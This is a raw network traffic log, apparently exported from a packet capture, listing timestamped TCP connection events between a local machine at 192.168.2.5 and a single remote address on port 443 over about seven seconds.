                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320235968 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320250988 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320291042 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320301056 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.435936928 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.435988903 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.436029911 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.980966091 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.996570110 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.996598959 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.002661943 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.002669096 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.009113073 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.009191036 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.012276888 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.012291908 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109409094 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109468937 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109539032 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109548092 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109590054 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109608889 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109741926 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109741926 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109759092 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109767914 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109772921 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113380909 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113473892 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113573074 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113761902 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113780022 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.133523941 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134151936 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134160042 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134599924 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134603977 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.136955976 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137088060 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137188911 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137367964 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137387037 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137401104 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137407064 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.139880896 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.139957905 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140044928 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140176058 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140198946 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267750025 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267770052 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267806053 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267832994 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267851114 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279552937 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279563904 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279572010 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279576063 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294121027 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294213057 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294292927 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.296168089 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.296205044 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.327877045 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332128048 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332142115 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332633972 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332638025 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.348758936 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349630117 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349705935 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349739075 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349752903 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349766016 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349770069 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.281750917 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.281897068 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.282198906 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.282210112 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385448933 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385713100 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385772943 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385814905 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385835886 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385849953 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385855913 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388523102 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388572931 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388767958 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388832092 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388844967 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.749336958 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750471115 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750494003 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750678062 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750684023 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.767847061 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768469095 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768501997 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768984079 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768996954 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.883759022 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884001970 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884291887 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884409904 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884409904 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884432077 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884442091 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887659073 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887692928 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887769938 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887989998 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887996912 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896543980 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896713018 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896830082 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896868944 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896868944 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896892071 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896905899 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.899893045 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.899940968 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.900437117 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.900866032 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.900882006 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.134402990 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.137252092 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.137270927 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.145519018 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.145525932 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.278728962 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.278978109 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.279344082 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.279511929 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.279511929 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.279544115 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.279556990 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.282939911 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.283046961 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.283097029 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.283329010 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.284066916 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:22.284090042 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.339359045 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.339422941 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.339582920 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.339591980 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.375547886 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376048088 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376106977 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376194954 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376194954 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376214027 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.376221895 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.379334927 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.379371881 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.379426003 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.379878998 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.379892111 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.387666941 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.387739897 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.387820005 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.388036966 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.388036966 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.388044119 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.388051033 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.390300035 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.390347004 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.391386032 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.391530991 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.391546965 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.984034061 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985021114 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985045910 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985300064 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985512972 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985517979 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985760927 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.985791922 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.986063004 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:23.986072063 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.061373949 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.061883926 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.061942101 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.062407017 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.062458038 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.119473934 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.120145082 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.120203018 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.120403051 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.120418072 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.122024059 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.122375011 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123024940 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123231888 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123260021 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123271942 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123275995 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123280048 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123383045 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123445988 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123517990 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123517990 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123537064 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.123554945 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126291037 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126374960 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126442909 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126472950 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126559973 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:24.126596928 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.013515949 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118583918 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118752003 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118808985 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118928909 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118952990 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118980885 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.118994951 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.121783972 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.121813059 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.123505116 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.123682022 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.123688936 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.133836031 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.133892059 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.133979082 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.134114981 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.134114981 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.134150982 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.134175062 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.138210058 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.138257980 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.138757944 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.138869047 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.138899088 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.351958990 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.357650042 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.357665062 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.358182907 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.358187914 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.483625889 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:25.483699083 CET4434974013.107.246.45192.168.2.5
